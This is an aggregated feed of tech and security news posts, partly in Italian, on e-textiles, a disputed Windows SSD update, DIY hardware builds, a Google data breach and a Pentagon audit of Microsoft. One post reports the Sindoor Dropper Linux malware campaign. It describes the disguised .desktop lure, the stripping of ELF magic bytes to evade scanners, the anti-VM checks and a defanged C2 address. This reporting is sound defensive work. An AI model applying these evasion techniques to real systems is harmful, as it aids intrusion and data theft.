I Computer in Fibra stanno arrivando! Arriva l’e-textile, la Rivoluzione dei Tessuti Intelligenti
Gli scienziati hanno assemblato gli elementi chiave di un sistema informatico in un unico filo flessibile, persino lavabile in lavatrice. L’idea è di intrecciare molti di questi fili in tessuto per creare “computer in fibra”: indumenti dotati di intelligenza e sensori integrati.
Questo è il passo successivo per i tessuti intelligenti, o e-textile: materiali con componenti elettronici che ampliano le capacità dei dispositivi indossabili e consentono la creazione, ad esempio, di tessuti e display interattivi. I primi esempi sono stati LilyPad nel 2007: moduli cuciti per indumenti, giocattoli e oggetti d’arte interattivi. Ma la maggior parte delle soluzioni presenta da tempo un problema comune: i fili stessi non potevano fare quasi nulla e non contenevano componenti individuali, il che rendeva difficile leggere i segnali biologici ed elaborare i dati in tempo reale.
Nel loro nuovo lavoro, i ricercatori hanno racchiuso sensori, comunicazioni, elaborazione e memoria in un unico filo elastico. Ogni filo si allunga del 60% ed è lavabile in lavatrice, rendendolo adatto all’uso quotidiano. Ogni fibra contiene otto dispositivi: quattro sensori (un fotodiodo, un sensore di temperatura, un accelerometro e un sensore PPG che misura le variazioni nell’assorbimento della luce cutanea ed è adatto al monitoraggio della frequenza cardiaca), oltre a un microcontrollore, due moduli di comunicazione e unità di gestione dell’alimentazione. Insieme, questo consente la raccolta, l’elaborazione e l’archiviazione dei dati, nonché la trasmissione dei risultati.
Per testare il sistema nella pratica, quattro “fili intelligenti” sono stati cuciti in una manica e in una gamba di un pantalone e a un volontario è stato chiesto di eseguire una serie di esercizi a corpo libero: squat, affondi, plank e rotazioni delle braccia. Ogni filo ha attivato la propria rete neurale addestrata, riconoscendo i movimenti in tempo reale. Una singola fibra ha identificato correttamente il tipo di azione nel 67% dei casi e, lavorando insieme a quattro fili, la precisione è aumentata al 95%.
Gli autori sottolineano che un simile progresso dimostra la potenza del rilevamento cooperativo “multi-nodo” e dell’elaborazione distribuita: i calcoli locali su ciascuna fibra sono integrati da una soluzione di rete e il sistema diventa più affidabile e preciso.
I ricercatori ammettono che ci sono ancora sfide da superare prima dell’applicazione su larga scala: accelerare lo scambio di dati tra thread, ridurre il consumo energetico ed espandere la larghezza di banda disponibile. Vedono i prossimi passi nello sviluppo di protocolli di comunicazione più veloci e a bassa latenza, specificamente pensati per i “computer in fibra”. Se questo avrà successo, l’abbigliamento sarà davvero in grado non solo di “sentire” una persona, ma anche di comprenderne i movimenti in tempo reale, senza compromettere la praticità e la normale cura degli oggetti.
L'articolo I Computer in Fibra stanno arrivando! Arriva l’e-textile, la Rivoluzione dei Tessuti Intelligenti proviene da il blog della sicurezza informatica.
Microsoft nega che l’aggiornamento di agosto abbia danneggiato gli SSD: gli utenti dicono il contrario
Microsoft ha negato che l’ aggiornamento di sicurezza di Windows 11 di agosto sia collegato a reclami di massa relativi a guasti dei dispositivi di archiviazione. L’indagine è stata avviata in seguito alle segnalazioni di utenti che, dopo l’installazione della patch KB5063878, hanno affermato che i loro SSD e HDD hanno iniziato a guastarsi o a danneggiare i dati.
L’azienda ha ammesso di essere a conoscenza di tali incidenti e di aver raccolto informazioni dai clienti interessati. Tuttavia, test interni e dati di telemetria non hanno confermato un aumento di guasti o danneggiamenti dei file. Anche i controlli congiunti con i produttori di dispositivi di archiviazione non hanno evidenziato una connessione tra l’aggiornamento e i problemi.
I primi a segnalare i malfunzionamenti sono stati gli utenti giapponesi.
Il problema si è verificato durante operazioni di scrittura intensive, come la copia di grandi volumi o di più file su unità riempite oltre il 60%. Alcuni dispositivi sono stati ripristinati dopo il riavvio, ma altri sono rimasti completamente inaccessibili.
Reclami simili sono stati ricevuti dai possessori di Corsair Force MP600, SanDisk Extreme Pro, Maxio SSD, Kioxia Exceria Plus G4, Kioxia M.2, nonché di unità installate su controller InnoGrit e Phison. Quest’ultima ha persino dichiarato di stare collaborando con Microsoft e altri partner per scoprire le cause dell’incidente. L’azienda ha sottolineato di comprendere l’entità del disagio e di stare verificando i controller interessati.
Fino a quando non saranno chiariti i dettagli, si consiglia agli utenti di Windows 11 di non eseguire operazioni di scrittura pesanti, ovvero di non copiare decine di gigabyte di dati su dispositivi di archiviazione pieni per oltre il 60%.
Microsoft, a sua volta, promette di continuare a monitorare il feedback dopo ogni aggiornamento e di indagare su tutti i nuovi incidenti.
L'articolo Microsoft nega che l’aggiornamento di agosto abbia danneggiato gli SSD: gli utenti dicono il contrario proviene da il blog della sicurezza informatica.
Watch Bondo Putty Get Sprayed Onto 3D Prints
3D prints destined for presentation need smooth surfaces, and that usually means sanding. [Uncle Jessy] came across an idea he decided to try out for himself: spraying Bondo spot putty onto a 3D print. Bondo spot putty comes from a tube, cures quickly, and sands smoothly. It’s commonly used to hide defects and give 3D prints a great finish. Could spraying liquified Bondo putty onto a 3D print save time, or act as a cheat code for hiding layer lines? [Uncle Jessy] decided to find out.
The first step is to turn the distinctive red putty into something that can be sprayed through a cheap, ten dollar airbrush. That part was as easy as squeezing putty into a cup and mixing in acetone in that-looks-about-right proportions. A little test spray showed everything working as expected, so [Uncle Jessy] used an iron man mask (smooth surfaces on the outside, textured inside) for a trial run.
Spraying the liquified Bondo putty looks about as easy as spraying paint. The distinctive red makes it easy to see coverage, and it cures very rapidly. It’s super easy to quickly give an object an even coating — even in textured and uneven spots — which is an advantage all on its own. To get a truly smooth surface one still needs to do some sanding, but the application itself looks super easy.
Is it worth doing? [Uncle Jessy] says it depends. First of all, aerosolizing Bondo requires attention to be paid to safety. There’s also a fair bit of setup involved (and a bit of mess) so it might not be worth the hassle for small pieces, but for larger objects it seems like a huge time saver. It certainly seems to cover layer lines nicely, but one is still left with a Bondo-coated object in the end that might require additional sanding, so it’s not necessarily a cheat code for a finished product.
If you think the procedure might be useful, check out the video (embedded below) for a walkthrough. Just remember to do it in a well-ventilated area and wear appropriate PPE.
An alternative to applying Bondo is brush application of UV resin, but we’ve also seen interesting results from non-planar ironing.
youtube.com/embed/dj6PETgwqgY?…
Sindoor Dropper: il malware che usa lo scontro India-Pakistan per infettare Linux
Un’insidiosa offensiva di malware, nota come “Sindoor Dropper”, si concentra sui sistemi operativi Linux, sfruttando metodi di spear-phishing raffinati e un complesso processo d’infezione articolato in diverse fasi. L’operazione subdola prende di mira gli utenti con esche legate al recente scontro tra Pakistan e India, conosciuto con il nome di Operazione Sindoor, al fine di convincerli ad attivare file nocivi.
La campagna Sindoor Dropper evidenzia un’evoluzione nelle tecniche di attacco degli autori delle minacce, dimostrando una chiara attenzione agli ambienti Linux, meno presi di mira dalle campagne di phishing.
L’attacco inizia quando un utente apre un .desktopfile dannoso, denominato “Note_Warfare_Ops_Sindoor.pdf.desktop”, che si spaccia per un normale documento PDF . Secondo l’analisi del sistema Nextron, una volta eseguito, apre un PDF escamotage benigno per mantenere l’illusione di legittimità, mentre avvia silenziosamente in background un processo di infezione complesso e fortemente offuscato.
Il .desktopfile, riporta Nextron, scarica diversi componenti, tra cui un decryptor AES ( mayuw) e un downloader crittografato ( shjdfhd). Un tratto peculiare di questa attività è l’utilizzo di file desktop trasformati in strumenti offensivi, tecnica in precedenza attribuita al gruppo APT36, altresì noto come Transparent Tribe o Mythic Leopard, specializzato nelle minacce avanzate e persistenti.
Il processo in questione è stato ideato per sfuggire sia all’analisi statica sia a quella dinamica. Al momento della sua individuazione, il payload iniziale non aveva lasciato traccia su VirusTotal, risultando quindi non rilevato. Il decryptor, un binario Go compresso con UPX, viene intenzionalmente corrotto rimuovendo i suoi magic byte ELF, probabilmente per bypassare le scansioni di sicurezza su piattaforme come Google Docs. Il .desktopfile ripristina questi byte sul computer della vittima per rendere nuovamente eseguibile il binario.
Questo avvia un processo in più fasi in cui ogni componente decifra ed esegue il successivo. La catena include controlli anti-macchina virtuale di base, come la verifica dei nomi delle schede e dei fornitori, l’inserimento nella blacklist di specifici prefissi di indirizzi MAC e il controllo del tempo di attività della macchina.
Il payload finale è una versione riadattata di MeshAgent, uno strumento di amministrazione remota open source legittimo. Una volta implementato, MeshAgent si connette a un server di comando e controllo (C2) ospitato su un’istanza EC2 di Amazon Web Services (AWS) all’indirizzo wss://boss-servers.gov.in.indianbosssystems.ddns[.]net:443/agent.ashx.
Ciò fornisce all’aggressore l’accesso remoto completo al sistema compromesso, consentendogli di monitorare l’attività dell’utente, spostarsi lateralmente sulla rete ed esfiltrare dati sensibili, ha affermato Nextron.
L'articolo Sindoor Dropper: il malware che usa lo scontro India-Pakistan per infettare Linux proviene da il blog della sicurezza informatica.
This Soviet-Style Clock Uses Homemade Nixie Tubes and Glowing Logic
The Neon glow of a Nixie tube makes for an attractive clock, but that’s not enough neon for some people. [Changliang Li] is apparently one of those people, because he’s using soviet-era cold-cathode tubes as the logic for his “Soviet-Era Style Clock”
Aside from the nixies for display, the key component you see working in this beautiful machine are the MTX-90 cold cathode thyratrons, which look rather like neon tubes in action. That’s because they essentially are, just with an extra trigger electrode (that this circuit doesn’t use). The neon tubes are combined into a loop counter, which translates the 50 Hz mains circuit in to seconds, minutes, and hours. The circuit is not original to this project, and indeed was once common to electronics books. The version used in this project is credited to [PA3FWM].
The Nixie tubes are new-made by [Sadudu] of iNixie labs, and we get a fascinating look in how they are made. (Tubemaking starts at around 1:37 in the video below.) It looks like a fiber laser is used to cut out glow elements for the tube, which is then encapsulated on a device which appears to be based around a lathe.
The cold-cathode tubes used as logic rely on ambient light or background radiation to start reliably, since the trigger electrode is left floating. In order to ensure reliable switching from the thyratrons, [Changliang Li] includes a surplus smoke detector source to ensure sufficient ionization. (The video seems to imply the MTX-90 was seeded with radioisotopes that have since decayed, but we could find no evidence for this claim. Comment if you know more.)
The end result is attractive and rather hypnotic. (Jump to 3:37 to see the clock in action.) If you want to know more about this sort of use for neon lamps (and the Soviet MTX-90) we featured a deeper dive a while back.
Thanks to [Changliang Li] for the incandescent tip. If one of your bright ideas has had a glow up into a project, don’t hesitate to share it on our tips line.
youtube.com/embed/rrTGYVDJwLA?…
The Latest Projects from Cornell’s ECE 4760/5730
ECE 4760/5730 is the Digital Systems Design Using Microcontrollers course at Cornell University taught by [Hunter Adams]. The list of projects for spring this year includes forty write-ups — if you haven’t got time to read the whole lot you can pick a random project between 1 and 40 with: shuf -i 1-40 -n 1 and let the cards fall where they may. Or if you’re made of time you could spend a few days watching the full playlist of 119 projects, embedded below.
We won’t pick favorites from this semester’s list of projects, but having skimmed through the forty reports we can tell you that the creativity and acumen of the students really shines through. If the name [Hunter Adams] looks familiar that might be because we’ve featured his work here on Hackaday before. Earlier this year we saw his Love Letter To Embedded Systems.
While on the subject, [Hunter] also wanted us to know that he has updated his lectures, which are here: Raspberry Pi Pico Lectures 2025. Particularly these have expanded to include a bunch of Pico W content (making Bluetooth servers, connecting to WiFi, UDP communication, etc.), and some fun lower-level stuff (the RP2040 boot sequence, how to write a bootloader), and some interesting algorithms (FFT’s, physics modeling, etc.).
youtube.com/embed/U21oHzGhfk4?…
Does it Make Sense to Upgrade a Prusa Mark 4S to a Core One?
One of the interesting things about Prusa’s FDM 3D printers is the availability of official upgrade kits, which allow you to combine bits off an older machine with those of the target machine to ideally save some money and not have an old machine gathering dust after the upgrade. While for a bedslinger-to-bedslinger upgrade this can make a lot of sense, the bedslinger to CoreXY Core One upgrade path is a bit more drastic. Recently the [Aurora Tech] channel had a look at which upgrade path makes the most sense, and in which scenario.
A big part of the comparison is the time and money spent compared to the print result, as you have effectively four options. Either you stick with the Mark 4S, get the DIY Core One (~8 hours of assembly time), get the preassembled Core One (more $$), or get the upgrade kit (also ~8 hours). There’s also the fifth option of getting the enclosure for the Mark 4S, but it costs about as much as the upgrade kit, so that doesn’t make a lot of logical sense.
In terms of print quality, it’s undeniable that the CoreXY motion system provides better results, with less ringing and better quality with tall prints, but unless you’re printing more than basic PLA and PETG, or care a lot about the faster print speeds of the CoreXY machine with large prints, the fully enclosed Core One is a bit overkill and sticking with the bedslinger may be the better choice. The long and short of it is that you have look at each option and consider what works best for your needs and your wallet.
youtube.com/embed/vC-F1i0gt2Q?…
Does it Make Sense to Upgrade a Prusa MK4S to a Core One?
One of the interesting things about Prusa’s FDM 3D printers is the availability of official upgrade kits, which allow you to combine bits off an older machine with those of the target machine to ideally save some money and not have an old machine gathering dust after the upgrade. While for a bedslinger-to-bedslinger upgrade this can make a lot of sense, the bedslinger to CoreXY Core One upgrade path is a bit more drastic. Recently the [Aurora Tech] channel had a look at which upgrade path makes the most sense, and in which scenario.
In terms of print quality, it’s undeniable that the CoreXY motion system provides better results, with less ringing and better quality with tall prints, but unless you’re printing more than basic PLA and PETG, or care a lot about the faster print speeds of the CoreXY machine with large prints, the fully enclosed Core One is a bit overkill and sticking with the bedslinger may be the better choice.
The long and short of it is that you have look at each option and consider what works best for your needs and your wallet.
youtube.com/embed/vC-F1i0gt2Q?…
Silent No More: Open-Source Fix for Mic Mishaps
“Sorry, my mic was muted…” With the rise of video calls, we’ve all found ourselves rushing to mute or unmute our mics in the midst of a call. This open-source Mute Button, sent in by [blackdevice], aims to take out the uncertainty and make toggling your mic easy.
It’s centered around a small PIC32MM microcontroller that handles the USB communications, controls the three built-in RGB LEDs, and reads the inputs from the encoder mounted to the center of this small device. The button knob combo is small enough to easily move around your desk, yet large enough to toggle without fuss when it’s your turn to talk.
To utilize all the functions of the button, you’ll need to install the Python-based driver on your machine. Doing so will let you not only toggle your microphone and volume, but it will also allow the button to light up to get your attention should you be trying to talk with the mic muted.
Although small, it’s also quite rugged, knowing it will spend its life being treated much like a game of Whac-A-Mole—slapped whenever needed. The case is designed to be 3D printed by any FDM printer, with the top knob section printed in translucent material to make the notification light clearly visible.
All of the design files, firmware, and parts list are available over on [blackdevices]’s GitHub page, and they are open-source, allowing you to tweak the design to fit your unique needs. Thank you for sending in this well-documented project, [blackdevices]; we look forward to seeing future work. If you like this type of thing, be sure to check out some of our other cool featured desk gadgets.
youtube.com/embed/E6khKvduem4?…
Building a Shifting Ratchet Wrench
Convenient though they may be, [Trevor Faber] found some serious shortcomings in shifting spanners: their worm gears are slow to adjust and prone to jamming, they don’t apply even force to all faces of a bolt head, and without a ratchet, they’re rather slow. To overcome these limitations, he designed his own adjustable ratchet wrench.
The adjustment mechanism is based on a pair of plates with opposing slots; the wrench faces are mounted on pins which fit into these slots, and one plate rotates relative to the other, the faces slide inwards or outwards. A significant advantage of this design is that, since one plate is attached to the wrench’s handle, some of the torque applied to the wrench tightens its grip on the bolt. To let the wrench loosen as well as tighten bolts, [Trevor] simply mirrored the mechanism on the other side of the wrench. Manufacturing proved to be quite a challenge: laser cutting wasn’t precise enough for critical parts, and CNC control interpolation resulted in some rough curves which caused the mechanism to bind, but after numerous iterations, [Trevor] finally got a working tool.
To use the wrench, you twist an outer ring to open the jaws, place them over the bolt, then let them snap shut. One nice touch is that you can close this wrench over a bolt, let go of it, and do something else without the wrench falling off the bolt. Recessed bolts were a bit of an issue, but a chamfer ought to improve this. It probably won’t be replacing your socket set, but it looks like it could make the odd job more enjoyable.
If you prefer a more conventional shifting wrench, you can make a miniature out of an M20 nut. It’s also possible to make a shifting Allen wrench.
youtube.com/embed/n_C0uh4HDA0?…
Thanks to [Adam Foley] for the tip!
Il Pentagono avvia un Audit su Microsoft. Si indaga sugli ingegneri cinesi e su presunte backdoor
Il Pentagono ha inviato una “lettera di preoccupazione” a Microsoft documentando una “violazione di fiducia” in merito all’utilizzo da parte dell’azienda di ingegneri cinesi per la manutenzione di sistemi informatici governativi sensibili, ha annunciato questa settimana il Segretario alla Difesa Pete Hegseth.
Allo stesso tempo, il Dipartimento della Difesa sta avviando un’indagine per verificare se qualcuno di questi dipendenti abbia compromesso la sicurezza nazionale.
“L’impiego di cittadini cinesi per la manutenzione degli ambienti cloud del Dipartimento della Difesa è finito”, ha affermato Hegseth in una dichiarazione video. “Abbiamo inviato una lettera formale di preoccupazione a Microsoft documentando questa violazione della fiducia e stiamo richiedendo un audit di terze parti sul programma di scorta digitale di Microsoft, incluso il codice e le richieste dei cittadini cinesi”.
“Hanno inserito qualcosa nel codice di cui non eravamo a conoscenza? Lo scopriremo”, ha aggiunto Hegseth.
Le azioni sono state intraprese in risposta a una recente indagine che ha svelato il sistema di “scorta digitale” di Microsoft, in cui personale statunitense con autorizzazioni di sicurezza supervisiona ingegneri stranieri, compresi quelli in Cina. ProPublica ha scoperto che gli addetti alla scorta spesso non possiedono le competenze necessarie per supervisionare efficacemente ingegneri con competenze tecniche molto più avanzate.
Il colosso della tecnologia ha sviluppato questo accordo per aggirare il requisito del Dipartimento della Difesa secondo cui le persone che gestiscono dati sensibili devono essere cittadini statunitensi o residenti permanenti.
“Il programma è stato progettato per rispettare le norme sugli appalti, ma ha esposto il dipartimento a rischi inaccettabili”, ha affermato Hegseth in un annuncio video pubblicato su X.
La lettera serve da avvertimento a Microsoft, che ha dichiarato nei suoi report finanziari di ricevere “ingenti entrate da contratti governativi”. È meno grave di una “cura notice”, che potrebbe portare alla risoluzione dei contratti Microsoft se i problemi non vengono risolti.
Il dipartimento non ha reso pubblica la lettera e non ha risposto alla richiesta di ProPublica di averne una copia
L'articolo Il Pentagono avvia un Audit su Microsoft. Si indaga sugli ingegneri cinesi e su presunte backdoor proviene da il blog della sicurezza informatica.
Open Source Interactive Wallpapers for Windows
It’s late at night, and you’re avoiding work that was supposed to be done yesterday. You could open an application on your desktop to keep your attention, or what about the desktop itself? [Underpig1] has you covered with Octos. Octos is an open-source application created to allow interactive wallpapers based on HTML, CSS, or JS for Windows 10 and 11.
There are many wallpaper applications made to spruce up your desktop, but Octos stands out to us here at Hackaday from the nature of being open source. What comes along with the project is a detailed API to reference when creating your own wallpaper. Additionally, this allows for detailed and efficient visualization techniques that would otherwise be difficult to display, perfect for procrastination.
Included demos range from an interactive solar system to Conway’s Game of Life. Customization options allow for basic manipulation of the backdrops in the application itself, but we’re sure you could allow for some fun options with enough tinkering.
If you want to try Octos out for yourself, it’s incredibly easy. Octos can be found on the Microsoft Store, and additional backdrops can be added within the application. Open-source applications allow for incredibly easy additions to your personal device, but it’s not always that way. Kindle has been a prime example of a fairly locked down system; however, that never stops a clever hacker!
Thanks to [Joshua Throm] for the tip!
FPGA Brings UNIX v1 to the DEC J-11
If you’ve never used a PDP-11 before it’s probably because you simply weren’t around in the 70s and 80s. Although they started as expensive machines only in research labs and industry, they eventually became much more accessible. They’re a bit of a landmark in computing history, too, being largely responsible for the development of things like UNIX and the C programming language. [ryomuk] is using an FPGA in combination with an original DEC J-11 to bring us a new take on this machine. (Google Translate from Japanese)
The FPGA used in this build is a Tang Nano 20k, notable for its relatively low cost. The FPGA emulates the memory system and UART of a PDP-11 system down to the instruction set, while the original, unmodified DEC chip is left to its own devices. After some initial testing [ryomuk] built a PC11 paper tape emulator to ensure the system was working which runs a version of BASIC from the era. The next thing up was to emulate some disk drives and co-processors so that the machine can run the first version of UNIX.
[ryomuk] also developed a PCB for the DEC microprocessor and the FPGA to sit on together, and it includes all of the jumpers and wiring needed to allow the computer to run UNIX, as well as handling other miscellaneous tasks like power. It’s an interesting build that gets to the heart of the early days of computer science. PDP-11 computers did eventually get smaller and more accessible, and if you want to build a modern version this build fits a complete system into an ATX case.
Thanks to [RetepV] for the tip!
Google avverte 2,5 miliardi di utenti Gmail: la sicurezza account a rischio. Fai il reset Password!
Un avviso di sicurezza di vasta portata è stato pubblicato da Google per i 2,5 miliardi di utenti del suo servizio Gmail, con l’obiettivo di rafforzare la protezione dei loro account a seguito di una violazione dei dati che ha interessato uno dei sistemi di terze parti basati su Salesforce gestiti dalla società.
Nel mese di giugno 2025 si è verificato un incidente che ha accresciuto le preoccupazioni in merito alle complesse operazioni di phishing, destinate a un vasto pubblico di utenti. Si tratta infatti di uno dei più grandi avvisi massivi di sicurezza inviati da Google, anche perché, nonostante molti utenti utilizzino password complesse, solo circa un terzo le aggiorna regolarmente, lasciando innumerevoli account esposti, soprattutto quelli che non utilizzano la MFA.
A giugno, un gruppo di cybercriminali identificato come UNC6040, noto anche con il suo marchio di estorsione ShinyHunters, è riuscito a infiltrarsi in un’istanza aziendale di Salesforce utilizzata da Google. Questo sistema memorizzava informazioni di contatto e note di vendita per piccole e medie imprese.
Gli aggressori hanno utilizzato una tattica di ingegneria sociale nota comephishing vocale, o “vishing”, per ottenere l’accesso iniziale. Impersonando telefonicamente il personale di supporto IT, hanno ingannato un dipendente, convincendolo a concedergli privilegi di sistema. Dall’analisi condotta da Google risulta che l’autore della minaccia è riuscito ad accedere e a recuperare un numero ristretto di dati che includevano informazioni basilari sull’azienda, in larga misura di dominio pubblico, quali i nomi delle aziende e gli indirizzi di contatto.
Nonostante i dati trafugati siano considerati di loro natura poco pericolosi, gli specialisti della sicurezza mettono in guardia che potrebbero essere utilizzati per effettuare attacchi di phishing e vishing estremamente realistici. Google ha sottolineato che la violazione non ha compromesso prodotti di consumo come Gmail o Google Drive e che non sono state esposte password o dati finanziari.
Le vittime vengono raggirate dagli aggressori, i quali utilizzano la notizia di una violazione per creare truffe che sembrano legittime, spingendo gli utenti a fornire i propri dati di accesso o i codici di autenticazione a due fattori. Le tattiche del gruppo criminale diventano più aggressive quando diffondono i dati o li usano per estorcere denaro, aumentando così la pressione sulle vittime. Ciò ha permesso agli hacker di esfiltrare i dati prima che il loro accesso venisse scoperto e bloccato dai team di sicurezza di Google. ShinyHunters è un noto gruppo collegato a recenti violazioni di dati in altre importanti aziende, tra cui Adidas, Cisco e LVMH.
L’8 agosto, Google ha comunicato di aver ultimato l’invio di email a tutte le parti coinvolte nella violazione, mentre il 5 agosto l’azienda aveva divulgato i dettagli dell’evento e delle attività di UNC6040. Considerato il consistente pericolo di ulteriori aggressioni, è fondamentale che tutti gli utilizzatori di Gmail restino allertati e applichino strategie preventive.
Si consiglia caldamente di rinnovare le credenziali di accesso, attivare la verifica a due passaggi e non prestare fede a messaggi di posta elettronica o contatti telefonici non richiesti che richiedono dati sensibili.
L'articolo Google avverte 2,5 miliardi di utenti Gmail: la sicurezza account a rischio. Fai il reset Password! proviene da il blog della sicurezza informatica.
Mosca assume i Criminal Hacker che avevano colpito la Scuola Elettronica nel 2022 per migliorarla
Ai partecipanti al cyberattacco alla Scuola Elettronica di Mosca è stato offerto di lavorare per migliorare la sicurezza informatica e altri servizi digitali dell’amministrazione della capitale. Tutto questo avviene a seguito del 17 settembre 2022, quando per tre giorni, studenti e insegnanti non hanno potuto caricare compiti, assegnare voti o utilizzare i servizi a causa di un attacco hacker.cnb.cnews.ru/click.php?zone=17…
Reclutamento di talenti
Le autorità di Mosca hanno assunto i criminal hacker dopo il loro attacco informatico alla piattaforma informatica della Scuola elettronica di Mosca (MES), scrive RBC. Secondo il vicesindaco di Mosca Anastasia Rakova, i partecipanti all’attacco informatico al MES hanno ricevuto un’offerta per lavorare al miglioramento della difesa informatica e di altri servizi digitali dell’amministrazione della capitale nel 2025. Secondo lei, le autorità della capitale sono pronte ad assumere talenti nel settore IT.
“Quattro giovani che negli anni precedenti avevano quasi portato a termine con successo il compito di hackerare la piattaforma IT, ora lavorano nel team MES”, ha detto il funzionario alla TASS. static.cnews.ru/img/news/2024/…La Scuola Elettronica di Mosca (MES) è stata lanciata dalle autorità cittadine nel 2016 ed è un’unica piattaforma educativa digitale per studenti, insegnanti e genitori. Tra i principali servizi del MES figurano una biblioteca di materiali didattici, un diario elettronico, un diario elettronico e un Portfolio Studentesco.
Oggi, la biblioteca della MES contiene oltre 1,6 milioni di materiali didattici, da compiti di verifica e scenari di lezione a laboratori virtuali e materiali per la preparazione agli esami. Possono aggiungere materiali sia sviluppatori nazionali specializzati che insegnanti ordinari.
Hacker nella scuola elettronica
Il Kommersant, vicino al Dipartimento dell’Istruzione e della Scienza di Mosca ha confermato che all’epoca il problema ha interessato quasi tutte le scuole: “Il caricamento dei compiti e dei voti non funzionava, né la versione mobile dei servizi”. Successivamente, nella sera del 20 settembre la maggior parte dei problemi era stata risolta.
Il MES aveva già avuto gravi problemi prima del 2022. Nel 2017, il Dipartimento di Tecnologia dell’Informazione (DIT) della città di Mosca aveva trasferito il MES su un nuovo software.
Nell’autunno del 2020, nel primo giorno di didattica a distanza nelle scuole di Mosca durante la pandemia di Covid-19 , gli insegnanti hanno dovuto svolgere le lezioni su Zoom a causa del pesante carico sull’infrastruttura informatica. Secondo gli esperti di sicurezza informatica, il fallimento non sarebbe stato una sorpresa per l’ufficio del sindaco se fossero state adottate in anticipo ulteriori misure di sicurezza informatica e fossero stati effettuati test di vulnerabilità informatica.
L'articolo Mosca assume i Criminal Hacker che avevano colpito la Scuola Elettronica nel 2022 per migliorarla proviene da il blog della sicurezza informatica.
Measuring Nanoparticles by Scattering a Laser
A fundamental difficulty of working with nanoparticles is that your objects of study are too small for an optical microscope to resolve, and thus measuring their size can be quite a challenge. Of course, if you have a scanning electron microscope, measuring particle size is straightforward. But for less well-equipped labs, a dynamic light scattering system, such as [Etienne]’s OpenDLS, fits the bill.
Dynamic light scattering works by shining a laser beam into a suspension of fine particles, then using a light sensor to measure the intensity of light scattered onto a certain point. As the particles undergo Brownian motion, the intensity of the scattered light changes. Based on the speed with which the scattered light varies, it’s possible to calculate the speed of the moving particles, and thus their size.
The OpenDLS uses a 3D printed and laser-cut frame to hold a small laser diode, which shines into a cuvette, on the side of which is the light sensor. [Etienne] tried a few different options, including a photoresistor and a light sensor designed for Arduino, but eventually chose a photodiode with a two-stage transimpedance amplifier. An Arduino samples the data at 67 kHz, then sends it over serial to a host computer, which uses SciPy and NumPy to analyse the data. Unfortunately, we were about six years late in getting to this story, and the Python program is a bit out of date by now (it was written in Python 2). It shouldn’t, however, be too hard for a motivated hacker to update.
With a standard 188 nm polystyrene dispersion, the OpenDLS calculated a size of 167 nm. Such underestimation seemed to be a persistent issue, probably caused by light being scattered multiple times. More dilution of the suspension would help, but it would also make the signal harder to measure, and the system’s already running near the limits of the hardware.
This isn’t the only creative way to measure the size of small particles, nor even the only way to investigate small particles optically. Of course, if you do have an electron microscope, nanoparticles make a good test target.
NFC Hidden In Floppy Disk For Retro-Themed PC
As we all look across a sea of lifeless, nearly identically-styled consumer goods, a few of us have become nostalgic for a time when products like stereo equipment, phones, appliances, homes, cars, and furniture didn’t all look indistinguishable. Computers suffered a similar fate, with nearly everything designed to be flat and minimalist with very little character. To be sure there are plenty of retro computing projects to recapture nostalgia, but to get useful, modern hardware in a fun, retro-themed case check out this desktop build from [Mar] that hides a few unique extras.
The PC itself is a modern build with an up-to-date operating system, but hidden in a 386-era case with early-90s styling. The real gem of this build though is the floppy disk drive, which looks unaltered on the surface. But its core functionality has been removed and in its place an Arduino sits, looking for NFC devices. The floppy disks similarly had NFC tags installed so that when they interact with the Arduino,it can send a command to the computer to launch a corresponding game. To the user it looks as though the game loads from a floppy disk, much like it would have in the 90s albeit with much more speed and much less noise.
Modern industrial design is something that we’ve generally bemoaned as of late, and it’s great to see some of us rebelling by building unique machines like this, not to mention repurposing hardware like floppy drives for fun new uses (which [Mar] has also open-sourced on a GitHub page). It’s not the first build to toss modern hardware in a cool PC case from days of yore, either. This Hot Wheels desktop is one of our favorites.
Feathers are Fantastic, but Flummoxing for Engineers
Birds are pretty amazing creatures, and one of the most amazing things about them and their non-avian predecessors are feathers. Engineers and scientists are finding inspiration from them in surprising ways.
The light weight and high strength of feathers has inspired those who look to soar the skies, dating back at least as far as Ancient Greece, but the multifunctional nature of these marvels has led to advancements in photonics, thermal regulation, and acoustics. The water repellency of feathers has also led to interesting new applications in both food safety and water desalination beyond the obvious water repellent clothing.
Sebastian Hendrickx-Rodriguez, the lead researcher on a new paper about the structure of bird feathers states, “Our first instinct as engineers is often to change the material chemistry,” but feathers are made in thousands of varieties to achieve different advantageous outcomes from a single material, keratin. Being biological in nature also means feathers have a degree of self repair that human-made materials can only dream of. For now, some researchers are building biohybrid devices with real bird feathers, but as we continue our march toward manufacturing at smaller and smaller scales, perhaps our robots will sprout wings of their own. Evolution has a several billion year head start, so we may need to be a little patient with researchers.
Some birds really don’t appreciate Big Brother any more than we do. If you’re looking for some feathery inspiration for your next flying machine, how about covert feathers. And we’d be remiss not to look back at the Take Flight With Feather Contest that focused on the Adafruit board with the same name.
The Confusing World of Wood Preservation Treatments
For the experiment three tests were set up, each with an untreated, self-treated and two pressure treated (tanalized) sections. Of the pressure treated wood one had a fresh cut on the exposed side, with each of the three tests focusing on a different scenario.
After three years of these wood cuts having been exposed to being either partially buried in soil, laid on the long side or tossed in a bucket, all while soaking up the splendid wonders of British weather, the results were rather surprising and somewhat confusing. The self-treated wood actually fared worse than the untreated wood, while the pressure treated wood did much better, but as a comment by [davidwx9285] on the video notes, there are many questions regarding how well the pressure treatment is performed.
While the self-treatment gets you generally only a surface coating of the – usually copper-based – compound, the vacuum pressure treatment’s effectiveness depends on how deep the preservative has penetrated, which renders some treated wood unsuitable for being buried in the ground. Along with these factors the video correctly identifies the issue of grain density, which is why hardwoods resist decay much better than e.g. pine. Ultimately it’s quite clear that ‘simply put on a wood preserver’ isn’t quite the magical bullet that it may have seemed to some.
youtube.com/embed/_76EFrsKa_U?…
The (RF) Sniff Test
Sometimes the old tricks are the best. [Kevin] learned an old trick about using a ‘scope to sniff RF noise and pays it forward by sharing it in a recent video. He uses an oscilloscope. But does he need some special probe setup? Nope. He quickly makes a little RF pickup probe, and if you have a ‘scope, we’re pretty sure you can make one in a few seconds, too.
Of course, you can get probes made for that, and there are advantages to using them. But the quick trick of quickly and non-destructively modifying the existing probe to pick up RF means you always have a way to make these measurements.
The first thing he probes is a small power supply that is broadcasting inadvertently at 60 kHz. The power supply was charging a bug zapper and, as you might expect, the bug zapper throws out a lot of noise on the radio bands.
If you have an FFT feature on your scope, that is often useful, too, as you can see the results of several interfering signals mixing together. Hunting down interference is a basic skill if you work with radio, and it’s useful even if you don’t.
youtube.com/embed/SF6RM-eI6sY?…
